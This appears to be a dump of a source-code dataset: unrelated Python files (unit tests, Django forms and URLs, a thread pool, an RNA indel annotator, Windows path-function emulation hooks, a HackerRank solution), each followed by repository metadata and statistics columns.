default_map_cmd2 = __builtin__.property(_get_default_map_cmd2, _set_default_map_cmd2) All_cmd2 = __builtin__.property(_get_All_cmd2, _set_All_cmd2) __choices__ = {u'apply-traffic-class-exp': {u'ca-map-name-cmd2': [u'map_name_cmd2'], u'ca-default-map-cmd2': [u'default_map_cmd2'], u'ca-all-zero-map-cmd2': [u'all_zero_map_cmd2']}} _pyangbind_elements = {'map_name_cmd2': map_name_cmd2, 'all_zero_map_cmd2': all_zero_map_cmd2, 'default_map_cmd2': default_map_cmd2, 'All_cmd2': All_cmd2, }
74.20614
665
0.729594
2,602
16,919
4.49731
0.071868
0.035891
0.032473
0.053581
0.843275
0.803367
0.780636
0.770723
0.760554
0.749103
0
0.010823
0.126249
16,919
227
666
74.53304
0.780762
0.137242
0
0.422819
0
0.04698
0.41266
0.196012
0
0
0
0
0
1
0.100671
false
0
0.053691
0
0.288591
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
99d0ec460ef85f6b78235bb1df6008162b91ab1f
904
py
Python
dypy/tests/test_variables.py
nickrsan/dypy
78ebdc02ce1908446d4cc6e0ee1927c91f820d9f
[ "MIT" ]
3
2019-03-12T21:13:45.000Z
2022-02-18T09:55:07.000Z
dypy/tests/test_variables.py
nickrsan/dypy
78ebdc02ce1908446d4cc6e0ee1927c91f820d9f
[ "MIT" ]
2
2019-04-03T02:13:54.000Z
2019-04-03T02:18:56.000Z
dypy/tests/test_variables.py
nickrsan/dypy
78ebdc02ce1908446d4cc6e0ee1927c91f820d9f
[ "MIT" ]
null
null
null
import unittest import dypy class VariableSupportTest(unittest.TestCase): def test_check_variable_id(self): """ Makes sure that when no variable_id is provided, we get the names we expect :return: """ name_id_pairs = { "variable_id": "variable_id", "Variable_id": "variable_id", "Variable ID": "variable_id", "5three Variable": "three_variable", "Remove-my-hyphens": "remove_my_hyphens", } leave_capitalization_intact = { "variable_id": "variable_id", "Variable_id": "Variable_id", "Variable ID": "Variable_ID", "5three Variable": "three_Variable", "Remove-my-hyphens": "Remove_my_hyphens", } for key in name_id_pairs: self.assertEqual(name_id_pairs[key], dypy.variables.check_variable_id(key, None)) for key in leave_capitalization_intact: self.assertEqual(leave_capitalization_intact[key], dypy.variables.check_variable_id(key, key))
25.828571
97
0.724558
118
904
5.245763
0.347458
0.258481
0.290792
0.323102
0.487884
0.487884
0.487884
0.378029
0.378029
0.378029
0
0.002614
0.153761
904
34
98
26.588235
0.806536
0.10177
0
0.090909
0
0
0.321696
0
0
0
0
0
0.090909
1
0.045455
false
0
0.090909
0
0.181818
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
99d12e7d29fef5924937d4cc8ce631b58a0747b3
740
py
Python
tests/testoctal.py
antoniovilarinholopes/converttodecimal
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
[ "MIT" ]
null
null
null
tests/testoctal.py
antoniovilarinholopes/converttodecimal
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
[ "MIT" ]
null
null
null
tests/testoctal.py
antoniovilarinholopes/converttodecimal
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
[ "MIT" ]
null
null
null
import unittest import baseconverter as bctr class TestOctal(unittest.TestCase): tests = [] results = [] base = 8 def test(self): for conv, result in zip(self.tests, self.results): self.assertEqual(conv.convert(), result) converter = bctr.DecimalBaseConverter("8",self.base) with self.assertRaises(bctr.InvalidDigitForBaseException) as context: converter.convert() self.assertTrue("invalid digits" in "".join(context.exception)) def setUp(self): converter = bctr.DecimalBaseConverter("7",self.base) self.tests.append(converter) self.results.append(7) converter = bctr.DecimalBaseConverter("10",self.base) self.tests.append(converter) self.results.append(8)
28.461538
73
0.697297
85
740
6.070588
0.435294
0.052326
0.19186
0.065891
0.189922
0.189922
0.189922
0.189922
0.189922
0
0
0.011551
0.181081
740
25
74
29.6
0.839934
0
0
0.1
0
0
0.024324
0
0
0
0
0
0.15
1
0.1
false
0
0.1
0
0.4
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99d3397248d3d1b7a9a0b3eafedbd9115d28514f
544
py
Python
sgfood/forms.py
kylerlee/Restaurant-Reviews-Web-App
795c46a2122717b94830249db005850898dd572a
[ "MIT" ]
null
null
null
sgfood/forms.py
kylerlee/Restaurant-Reviews-Web-App
795c46a2122717b94830249db005850898dd572a
[ "MIT" ]
null
null
null
sgfood/forms.py
kylerlee/Restaurant-Reviews-Web-App
795c46a2122717b94830249db005850898dd572a
[ "MIT" ]
null
null
null
from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm class UserRegisterForm(UserCreationForm): email = forms.EmailField(label='Email') first_name = forms.CharField( max_length=20, label='First Name', required=False) last_name = forms.CharField( max_length=20, label='Last Name', required=False) class Meta: model = User fields = ['username', 'email', 'first_name', 'last_name', 'password1', 'password2']
32
58
0.681985
63
544
5.793651
0.460317
0.082192
0.093151
0.115068
0.186301
0.186301
0.186301
0
0
0
0
0.013921
0.207721
544
16
59
34
0.832947
0
0
0
0
0
0.136029
0
0
0
0
0
0
1
0
false
0.076923
0.230769
0
0.615385
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
99d362a541a18ec8d12caecd6f148f337e916cdc
1,391
py
Python
src/external_script_runner.py
salvatorenovelli/python-automation-runner
7d18d02f3e60980d18e97991e7991ba3aa43e79a
[ "Apache-2.0" ]
1
2019-06-05T00:56:13.000Z
2019-06-05T00:56:13.000Z
src/external_script_runner.py
salvatorenovelli/python-automation-runner
7d18d02f3e60980d18e97991e7991ba3aa43e79a
[ "Apache-2.0" ]
null
null
null
src/external_script_runner.py
salvatorenovelli/python-automation-runner
7d18d02f3e60980d18e97991e7991ba3aa43e79a
[ "Apache-2.0" ]
null
null
null
import logging import os import signal import time from multiprocessing import Process class ExternalScript: def __init__(self, name, path): self.name = name self.path = path self.process = None def start_main_loop(self): if self.process is None: self.process = Process(target=run_external_script_main_loop, args=(self.name, self.path)) self.process.start() logging.info("External script started. PID: %d", self.process.pid) def stop_main_loop(self): if self.process is not None: logging.info("Killing external script with PID: %d", self.process.pid) os.kill(self.process.pid, signal.SIGTERM) self.process = None def run_external_script_main_loop(name, path): try: script = import_source(name, path) logging.info("Script loaded") while 1: start = time.time() try: script.main_loop() except Exception as e: logging.error("Error in script '%s': %s", path, str(e)) if (time.time() - start) < .05: time.sleep(1) except Exception as e1: logging.error("Unable to run main_loop: " + str(e1)) def import_source(name, path): from importlib.machinery import SourceFileLoader return SourceFileLoader(name, path).load_module()
30.23913
101
0.615385
175
1,391
4.771429
0.342857
0.118563
0.050299
0.043114
0.167665
0.064671
0.064671
0
0
0
0
0.00603
0.284687
1,391
45
102
30.911111
0.833166
0
0
0.108108
0
0
0.093458
0
0
0
0
0
0
1
0.135135
false
0
0.216216
0
0.405405
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99d682c3f29dd2435974d682aa3469e2490bd049
220
py
Python
spotui/src/Logging.py
dbkosky/spotui
cabc6fbde3c0fbbc73fd94055661185ad51969c1
[ "MIT" ]
410
2020-01-08T17:23:52.000Z
2022-03-31T03:19:01.000Z
spotui/src/Logging.py
octoshrimpy/spotui
b0d195d1cdc803839e8421472ed897521c6124d4
[ "MIT" ]
28
2020-01-09T00:10:10.000Z
2022-03-19T01:22:39.000Z
spotui/src/Logging.py
octoshrimpy/spotui
b0d195d1cdc803839e8421472ed897521c6124d4
[ "MIT" ]
22
2020-01-10T04:08:22.000Z
2022-03-17T13:31:13.000Z
import logging import os user_config_dir = os.path.expanduser("~") logging.basicConfig(filename=user_config_dir + '/.cache/spotui.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')
31.428571
82
0.659091
28
220
5.035714
0.714286
0.141844
0.184397
0
0
0
0
0
0
0
0
0
0.168182
220
6
83
36.666667
0.770492
0
0
0
0
0
0.263636
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
4
99d6b69bacc16386a2d51e2e47e08c035278f928
1,029
py
Python
drone/remote_control/start.py
dpm76/eaglebone
46403d03359a780f385ccb1f05b462869eddff89
[ "ISC" ]
null
null
null
drone/remote_control/start.py
dpm76/eaglebone
46403d03359a780f385ccb1f05b462869eddff89
[ "ISC" ]
18
2016-03-30T08:43:45.000Z
2017-03-27T11:14:17.000Z
drone/remote_control/start.py
dpm76/eaglebone
46403d03359a780f385ccb1f05b462869eddff89
[ "ISC" ]
2
2016-03-06T20:38:06.000Z
2019-09-10T14:46:35.000Z
# -*- coding: utf-8 -*- ''' Created on 15/06/2015 @author: david ''' import sys if sys.version_info.major < 3: from SocketServer import TCPServer else: from socketserver import TCPServer import datetime import logging from remote_control.dispatching import Dispatcher def main(): logging.basicConfig(filename="remote_control_{0}.log".format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")), \ format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%d/%m/%y %H:%M:%S', \ level=logging.ERROR) logging.info("**** [Starting server...] ****") server = TCPServer(("0.0.0.0", 2121), Dispatcher) message = "Waiting for remote control..." logging.info(message) print(message) try: server.serve_forever() except KeyboardInterrupt: print("[CTRL+C] -> Stop") finally: print("Goodbye!") logging.info("**** [Server finish] ****") if __name__ == '__main__': main()
21.4375
118
0.594752
119
1,029
5.02521
0.571429
0.065217
0.073579
0.103679
0
0
0
0
0
0
0
0.027954
0.23518
1,029
47
119
21.893617
0.731893
0.058309
0
0
0
0
0.235172
0.046826
0
0
0
0
0
1
0.038462
false
0
0.230769
0
0.269231
0.115385
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99d6c24393f666e309f1685a7bc70884ed6cd31a
2,390
py
Python
src/threadpool.py
forumulator/pySlader
b2300da6c10f46f0fa9933be722462a42a98bdbc
[ "MIT" ]
1
2018-10-28T23:33:57.000Z
2018-10-28T23:33:57.000Z
src/threadpool.py
forumulator/pySlader
b2300da6c10f46f0fa9933be722462a42a98bdbc
[ "MIT" ]
null
null
null
src/threadpool.py
forumulator/pySlader
b2300da6c10f46f0fa9933be722462a42a98bdbc
[ "MIT" ]
null
null
null
from queue import Queue, Empty import threading from threading import Thread class Worker(Thread): _TIMEOUT = 2 """ Thread executing tasks from a given tasks queue. Thread is signalable, to exit """ def __init__(self, tasks, th_num): Thread.__init__(self) self.tasks = tasks self.daemon, self.th_num = True, th_num self.done = threading.Event() self.start() def run(self): while not self.done.is_set(): try: func, args, kwargs = self.tasks.get(block=True, timeout=self._TIMEOUT) try: func(*args, **kwargs) except Exception as e: print(e) finally: self.tasks.task_done() except Empty as e: pass return def signal_exit(self): """ Signal to thread to exit """ self.done.set() class ThreadPool: """Pool of threads consuming tasks from a queue""" def __init__(self, num_threads, tasks=[]): self.tasks = Queue(num_threads) self.workers = [] self.done = False self._init_workers(num_threads) for task in tasks: self.tasks.put(task) def _init_workers(self, num_threads): for i in range(num_threads): self.workers.append(Worker(self.tasks, i)) def add_task(self, func, *args, **kwargs): """Add a task to the queue""" self.tasks.put((func, args, kwargs)) def _close_all_threads(self): """ Signal all threads to exit and lose the references to them """ for workr in self.workers: workr.signal_exit() self.workers = [] def wait_completion(self): """Wait for completion of all the tasks in the queue""" self.tasks.join() def __del__(self): self._close_all_threads() def create_task(func, *args, **kwargs): return (func, args, kwargs) if __name__ == '__main__': from random import randrange from time import sleep delays = [randrange(1, 10) for i in range(30)] def wait_delay(d): print('sleeping for (%d)sec' % d) sleep(d) pool = ThreadPool(20) for i, d in enumerate(delays): pool.add_task(wait_delay, d) pool.wait_completion()
27.471264
79
0.562762
296
2,390
4.358108
0.310811
0.062791
0.065116
0.026357
0
0
0
0
0
0
0
0.005031
0.334728
2,390
87
80
27.471264
0.806289
0.085356
0
0.065574
0
0
0.013592
0
0
0
0
0
0
1
0.180328
false
0.016393
0.081967
0.016393
0.344262
0.032787
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99d87c84c1f650596334fdedf093088152cfe4fd
1,069
py
Python
isaactest/tests/questionnaire.py
jsharkey13/isaac-selenium-testing
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
[ "MIT" ]
null
null
null
isaactest/tests/questionnaire.py
jsharkey13/isaac-selenium-testing
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
[ "MIT" ]
1
2016-01-15T11:28:06.000Z
2016-01-25T17:09:18.000Z
isaactest/tests/questionnaire.py
jsharkey13/isaac-selenium-testing
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
[ "MIT" ]
1
2019-05-14T16:53:49.000Z
2019-05-14T16:53:49.000Z
from ..utils.log import log, INFO, ERROR, PASS from ..utils.isaac import kill_irritating_popup, disable_irritating_popup from ..utils.i_selenium import assert_tab from ..tests import TestWithDependency __all__ = ["questionnaire"] ##### # Test : Questionnaire Popup ##### @TestWithDependency("QUESTIONNAIRE", ["LOGIN"]) def questionnaire(driver, ISAAC_WEB, **kwargs): """Test if the questionnaire popup is shown. Must run immediately after the "LOGIN" test. - 'driver' should be a Selenium WebDriver. - 'ISAAC_WEB' is the string URL of the Isaac website to be tested. """ assert_tab(driver, ISAAC_WEB) log(INFO, "Ensure the popup has not been disabled, and wait 30 seconds for it to display.") disable_irritating_popup(driver, undo=True) # Make sure we've not disabled it at all! if kill_irritating_popup(driver, 30): log(PASS, "Questionnaire popup shown and closed.") return True else: log(ERROR, "Questionnaire popup not shown! This may be because none are published?") return False
36.862069
95
0.707203
144
1,069
5.125
0.506944
0.081301
0.051491
0
0
0
0
0
0
0
0
0.004662
0.197381
1,069
28
96
38.178571
0.855478
0.255379
0
0
0
0
0.283465
0
0
0
0
0
0.125
1
0.0625
false
0.125
0.25
0
0.4375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
99d9a48b5d99ac3508e56112ec75780dfbe5858e
8,893
py
Python
rnaindel/rnaindel_lib/indel_annotator.py
adamdingliang/RNAIndel
bc154a25a459ca0dd5c1f2ce064944e979105d23
[ "Apache-2.0" ]
1
2019-01-07T21:21:28.000Z
2019-01-07T21:21:28.000Z
rnaindel/rnaindel_lib/indel_annotator.py
adamdingliang/RNAIndel
bc154a25a459ca0dd5c1f2ce064944e979105d23
[ "Apache-2.0" ]
2
2019-01-05T16:39:41.000Z
2019-01-14T16:00:43.000Z
rnaindel/rnaindel_lib/indel_annotator.py
adamdingliang/RNAIndel
bc154a25a459ca0dd5c1f2ce064944e979105d23
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 """2nd step of the analysis Checks if indels are coding or non-coding and annotates coding indels with variant effect indel_annotator is the main routine of this module """ import sys import pysam import logging import pandas as pd from functools import partial from .indel_curator import curate_indel_in_genome from .indel_sequence import CodingSequenceWithIndel logger = logging.getLogger(__name__) def indel_annotator(df, refgene, fasta, chr_prefixed): """Sort coding indels and annotate coding indels with variant effect Args: df (pandas.DataFrame): with a header:'chr', 'pos', 'ref', 'alt' refgene (str): path to refCodingExon.bed.gz fasta (str): path to fasta Returns: df (pandas.DataFrame): with indels annotated """ df["is_ins"] = df.apply(is_insertion, axis=1) df["indel_seq"] = df.apply(get_indel_seq, axis=1) # performs annotation exon_data = pysam.TabixFile(refgene) anno = partial( annotate_indels, exon_data=exon_data, fasta=fasta, chr_prefixed=chr_prefixed ) df["annotation"] = df.apply(anno, axis=1) # removes unannotated calls (non-coding indels) df = df[df["annotation"] != "-"] if len(df) == 0: logging.warning("No indels annotated in coding region. Analysis done.") sys.exit(0) # gene symbols df["gene_symbol"] = df.apply(get_gene_symbol, axis=1) # formats the header df = df[ [ "chr", "pos", "ref", "alt", "rescued", "indel_seq", "annotation", "gene_symbol", "is_ins", ] ] return df def is_insertion(row): """Encodes if the indel is an insertion or deletion. Args: row (pandas.Series): reference seq (str) at index 'ref' Returns: is_insertion (int): 0 if insertion, 1 if deletion """ is_insertion = 0 if row["ref"] == "-": is_insertion = 1 return is_insertion def get_indel_seq(row): """Gets indel sequence Args: row (pandas.Series): a Series with 'ref' and 'alt' indices Returns: indel_seq (str): inserted or deleted sequence """ if row["ref"] == "-": indel_seq = row["alt"] else: indel_seq = row["ref"] return indel_seq def annotate_indels(row, exon_data, fasta, chr_prefixed, postprocess=False): """Annotates indels for all RefSeq isoforms Args: row (pandas.Series): a Series with indices 'chr', 'pos', 'is_ins', 'indel_seq' exon_data (pysam.TabixFile): coding exon database fasta (str): path to fasta file chr_prefixed (bool): True if chromosome names in BAM are "chr"-prefixed postprocess (bool): True if used in indel_postprocessor. Default to False Returns: annotation (str): Each token represents an annotation for one of the isoforms and is formatted as: GeneSymbol|RefSeqAccession|AminoAcidPostion|Effect|IsInsensitive GeneSymbol: RefSeq gene name RefSeqAccession: RefSeq mRNA accession number CodonPostion: the position of codon (not amino acid) affected in the isoform specified in RefSeqAccession Effect: consequences of the indel. See CodingSequenceWithIndel for detail IsInsensitive: 1 if the indel is nonsense-mediated-decay insensitive, 0 otherwise '-' for non-coding indels """ chr = row["chr"] pos = row["pos"] idl_type = row["is_ins"] idl_seq = row["indel_seq"] # generates CodingSequenceWithIndel instances idls = generate_coding_indels( chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed ) # annotates for all RefSeq isoforms annots = [] if idls != []: for idl in idls: gene = idl.gene_symbol refseq_acc = idl.accession codon_pos, effect = idl.effect() is_insensitive = idl.is_nmd_insensitive() if not postprocess: anno = ( gene + "|" + refseq_acc + "|" + str(codon_pos) + "|" + effect + "|" + str(is_insensitive) ) else: anno = gene + "|" + refseq_acc + "|" + str(codon_pos) + "|" + effect annots.append(anno) if len(annots) == 0: annotation = "-" else: annotation = ",".join(annots) return annotation def generate_coding_indels(chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed): """Generates coding indel objects Args: chr (str): chr1-22, chrX or chrY. Note "chr"-prefixed. pos (int): 1-based genomic position idl_type (int): 1 for insertion, 0 for deletion idl_seq (str): inserted or deleted sequence exon_data (pysam.TabixFile): coding exon database fasta (str): path to fasta file chr_prefixed (bool): True if chromosome names in BAM or FASTA are "chr"-prefixed Returns: coding_idl_lst (list): a list of CodingSequenceWithIndel obj empty list if non-coding indel """ coding_idl_lst = [] try: candidate_genes = exon_data.fetch(chr, pos - 11, pos + 11) except: candidate_genes = None # check for UTR if candidate_genes: for line in candidate_genes: lst = line.split("\t") # parsing exon info info = lst[3].split("|") exon = int(info[2]) last_exon = int(info[3]) # exon start and end exon_start, exon_end = int(lst[1]), int(lst[2]) # strand strand = lst[4] # 5'UTR on positive strand (insertion) if strand == "+" and exon == 1 and idl_type == 1 and exon_start >= pos: pass # 5'UTR on positive strand (deletion) elif strand == "+" and exon == 1 and idl_type == 0 and exon_start > pos: pass # 3'UTR on positive strand elif strand == "+" and exon == last_exon and pos > exon_end: pass # 5'UTR on negative strand elif strand == "-" and exon == 1 and pos > exon_end: pass # 3'UTR on negative strand (insertion) elif ( strand == "-" and exon == last_exon and idl_type == 1 and exon_start >= pos ): pass # 3'UTR on negative strand (deletion) elif ( strand == "-" and exon == last_exon and idl_type == 0 and exon_start > pos ): pass else: indel_in_reference_genome = curate_indel_in_genome( fasta, chr, pos, idl_type, idl_seq, chr_prefixed ) lt_seq = indel_in_reference_genome.lt_seq rt_seq = indel_in_reference_genome.rt_seq accession = info[0] gene_symbol = info[1] cds_start = int(info[4]) prev_exon = lst[5].split("|") prev_exon_start, prev_exon_end = int(prev_exon[0]), int(prev_exon[1]) next_exon = lst[6].split("|") next_exon_start, next_exon_end = int(next_exon[0]), int(next_exon[1]) indel = CodingSequenceWithIndel( chr, pos, idl_type, lt_seq, idl_seq, rt_seq, strand, accession, gene_symbol, exon, exon_start, exon_end, last_exon, cds_start, prev_exon_start, prev_exon_end, next_exon_start, next_exon_end, ) coding_idl_lst.append(indel) return coding_idl_lst def get_gene_symbol(row): """Extracts gene name from annotation Args: row (pandas.Series): annotation info (str) at 'annotation' index Returns: gene_symbol (str): gene name(s) """ pd.options.mode.chained_assignment = None lst = row["annotation"].split(",") genes = [token.split("|")[0] for token in lst] gene_symbol = ",".join(set(genes)) return gene_symbol
30.145763
88
0.534353
1,002
8,893
4.576846
0.220559
0.028783
0.017008
0.018535
0.257959
0.209769
0.152638
0.127344
0.1099
0.07283
0
0.009728
0.375801
8,893
294
89
30.248299
0.816429
0.342179
0
0.151899
0
0
0.040022
0
0
0
0
0
0
1
0.037975
false
0.037975
0.044304
0
0.120253
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99db77b0d0571155bd78aac43f3d762eb5c8d3d3
1,494
py
Python
problem_solving/python/algorithms/implementation/cavity_map.py
kcc3/hackerrank-solutions
f862b44b840bd447d99dc148f6bb5e2f5bfb8a86
[ "MIT" ]
null
null
null
problem_solving/python/algorithms/implementation/cavity_map.py
kcc3/hackerrank-solutions
f862b44b840bd447d99dc148f6bb5e2f5bfb8a86
[ "MIT" ]
null
null
null
problem_solving/python/algorithms/implementation/cavity_map.py
kcc3/hackerrank-solutions
f862b44b840bd447d99dc148f6bb5e2f5bfb8a86
[ "MIT" ]
1
2020-06-04T09:23:19.000Z
2020-06-04T09:23:19.000Z
def cavity_map(grid): """Hackerrank Problem: https://www.hackerrank.com/challenges/cavity-map/problem You are given a square map as a matrix of integer strings. Each cell of the map has a value denoting its depth. We will call a cell of the map a cavity if and only if this cell is not on the border of the map and each cell adjacent to it has strictly smaller depth. Two cells are adjacent if they have a common side, or edge. Find all the cavities on the map and replace their depths with the uppercase character X. For example, given a matrix: 989 191 111 You should return: 989 1X1 111 The center cell was deeper than those on its edges: [8,1,1,1]. The deep cells in the top two corners don't share an edge with the center cell. Args: grid (list): a list of strings denoting the depths of the teeth Returns: list: a list of strings with X's in the place where there are cavities """ output_grid = grid n = len(grid) for i in xrange(n): for j in xrange(n): if 0 < i < (n - 1) and 0 < j < (n - 1): if grid[i][j] > grid[i+1][j] and grid[i][j] > grid[i-1][j]: if grid[i][j] > grid[i][j+1] and grid[i][j] > grid[i][j-1]: output_grid[i] = output_grid[i][:j] + "X" + output_grid[i][j+1:] return output_grid if __name__ == "__main__": map = ["1112", "1912", "1892", "1234"] print cavity_map(map)
33.954545
119
0.615127
259
1,494
3.490347
0.416988
0.060841
0.053097
0.044248
0.108407
0.068584
0.057522
0
0
0
0
0.043192
0.287149
1,494
44
120
33.954545
0.805634
0
0
0
0
0
0.046468
0
0
0
0
0
0
0
null
null
0
0
null
null
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99dd827cc75c97313b16be59de14d6bad416a8e2
1,242
py
Python
rugosa/emulation/call_hooks/win_api/shlwapi.py
Defense-Cyber-Crime-Center/rugosa
70f5b1db7e3f02ecccb0495fe1c0c77930769276
[ "MIT" ]
1
2022-03-13T03:03:31.000Z
2022-03-13T03:03:31.000Z
rugosa/emulation/call_hooks/win_api/shlwapi.py
Defense-Cyber-Crime-Center/rugosa
70f5b1db7e3f02ecccb0495fe1c0c77930769276
[ "MIT" ]
null
null
null
rugosa/emulation/call_hooks/win_api/shlwapi.py
Defense-Cyber-Crime-Center/rugosa
70f5b1db7e3f02ecccb0495fe1c0c77930769276
[ "MIT" ]
null
null
null
""" Functions found in shlwapi.dll Shell Lightweight Utility Functions """ import logging import ntpath from ...call_hooks import builtin_func logger = logging.getLogger(__name__) @builtin_func("PathAppendA") @builtin_func("PathAppendW") #typedef(BOOL PathAppendA(LPSTR pszPath,LPCSTR pszMore);) def pathappend(cpu_context, func_name, func_args): """ Appends one path to the end of another """ wide = func_name.endswith(u"W") path_ptr, more_ptr = func_args curr_path = cpu_context.memory.read_string(path_ptr, wide=wide) more_path = cpu_context.memory.read_string(more_ptr, wide=wide) full_path = ntpath.join(curr_path, more_path) cpu_context.memory.write_string(path_ptr, full_path, wide=wide) return True @builtin_func("PathAddBackslashA") @builtin_func("PathAddBackslashW") #typedef(LPWSTR PathAddBackslashW(LPWSTR pszPath));) def pathaddbackslash(cpu_context, func_name, func_args): """ Appends a backslash to the path """ wide = func_name.endswith(u"W") path_ptr = func_args[0] curr_path = cpu_context.memory.read_string(path_ptr, wide=wide) full_path = curr_path + "\\" cpu_context.memory.write_string(path_ptr, full_path, wide=wide) return True
25.346939
67
0.738325
171
1,242
5.081871
0.362573
0.080552
0.080552
0.115075
0.482163
0.437284
0.402762
0.326812
0.260069
0.260069
0
0.000952
0.154589
1,242
48
68
25.875
0.826667
0.198873
0
0.347826
0
0
0.062827
0
0
0
0
0
0
1
0.086957
false
0
0.130435
0
0.304348
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ddb51556072c9fe39d711ea4b8ad9ad506d836
1,057
py
Python
massage/urls.py
Johncs2d/accounting-system
46d660044b198afadbf6f90b72376f6a69166c5f
[ "MIT" ]
null
null
null
massage/urls.py
Johncs2d/accounting-system
46d660044b198afadbf6f90b72376f6a69166c5f
[ "MIT" ]
2
2021-03-19T00:39:18.000Z
2021-03-30T12:48:58.000Z
massage/urls.py
Johncs2d/accounting-system
46d660044b198afadbf6f90b72376f6a69166c5f
[ "MIT" ]
null
null
null
from django.urls import path from . import views urlpatterns = [ path('', views.index, name='index'), path('info', views.info, name='info'), path('chart', views.charts, name='chart'), path('trialbalance', views.trialbalance, name='trialbalance'), path('ledger', views.ledger, name='ledger'), path('balancesheet', views.balancesheet, name='balancesheet'), path('incomestatement', views.incomestatement, name='incomestatement'), path('journalize', views.journalize, name='journalize'), path('sign_up/', views.sign_up, name='sign_up'), path("insertaccount", views.insertaccount, name='insertaccount'), path("inserjournal", views.inserjournal, name='inserjournal'), path("register", views.signupform, name='register'), path("login", views.loginForm, name='login'), path("logout", views.logusout, name='logout'), path("log_in", views.log_me_in, name='log_in'), path("journal_list", views.journalList, name='journal_list'), path("journal_control",views.journalControls,name='journalControls') ]
48.045455
75
0.69631
120
1,057
6.05
0.291667
0.024793
0
0
0
0
0
0
0
0
0
0
0.122044
1,057
22
76
48.045455
0.782328
0
0
0
0
0
0.285444
0
0
0
0
0
0
1
0
false
0
0.095238
0
0.095238
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99dffa459bc7dfffb6f4a430b3ffac5f8cc05734
194
py
Python
smores/__init__.py
codylandry/Smores
cc0717b5edd0c09982820cc8705f73119641d0a2
[ "MIT" ]
7
2017-09-18T13:04:30.000Z
2021-06-03T06:48:26.000Z
smores/__init__.py
codylandry/Smores
cc0717b5edd0c09982820cc8705f73119641d0a2
[ "MIT" ]
1
2017-11-22T20:45:27.000Z
2017-11-22T20:45:27.000Z
smores/__init__.py
codylandry/Smores
cc0717b5edd0c09982820cc8705f73119641d0a2
[ "MIT" ]
null
null
null
from .smores import Smores, AutocompleteResponse, TemplateString, TemplateFile, Schema, Nested __all__ = ['Smores', 'AutocompleteResponse', 'TemplateString', 'TemplateFile', 'Schema', 'Nested']
64.666667
98
0.778351
16
194
9.1875
0.5625
0.353742
0.544218
0.707483
0.870748
0.870748
0
0
0
0
0
0
0.087629
194
2
99
97
0.830508
0
0
0
0
0
0.329897
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
8
99e0f1004b2ba5a8602f4459d12c69e706b39a07
23,795
py
Python
opslib/icsec2.py
movermeyer/opslib
157be1342cf24297ef6b79cbe320207e610c9c81
[ "Apache-2.0" ]
1
2015-06-10T17:47:56.000Z
2015-06-10T17:47:56.000Z
opslib/icsec2.py
movermeyer/opslib
157be1342cf24297ef6b79cbe320207e610c9c81
[ "Apache-2.0" ]
null
null
null
opslib/icsec2.py
movermeyer/opslib
157be1342cf24297ef6b79cbe320207e610c9c81
[ "Apache-2.0" ]
2
2016-02-29T23:48:57.000Z
2018-03-05T17:26:35.000Z
